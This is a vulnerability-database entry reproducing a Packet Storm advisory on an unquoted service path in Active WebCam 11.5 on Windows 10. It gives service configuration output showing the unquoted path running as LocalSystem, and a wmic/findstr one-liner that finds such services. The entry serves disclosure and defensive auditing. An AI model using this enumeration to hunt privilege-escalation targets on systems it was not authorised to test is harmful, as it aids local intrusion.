Lucene search
K

Active WebCam 11.5 Unquoted Service Path

🗓️ 14 Sep 2021 00:00:00Reported by Salman AsadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 248 Views

Active WebCam 11.5 Unquoted Service Path on Windows 1

Code
`# Exploit Title: Active WebCam 11.5 - Unquoted Service Path  
# Exploit Author: Salman Asad (@deathflash1411, [email protected])  
# Date: 09.09.2021  
# Software Link: https://www.techspot.com/downloads/175-active-webcam.html  
# Vendor Homepage: https://www.pysoft.com/  
# Version: 11.5  
# Tested on: Windows 10  
  
# Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options  
  
# Proof of Concept:  
  
C:\Users\death>sc qc ACTIVEWEBCAM  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: ACTIVEWEBCAM  
TYPE : 110 WIN32_OWN_PROCESS (interactive)  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files\Active WebCam\WebCam.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Active WebCam  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """  
Active WebCam ACTIVEWEBCAM C:\Program Files\Active WebCam\WebCam.exe Auto  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation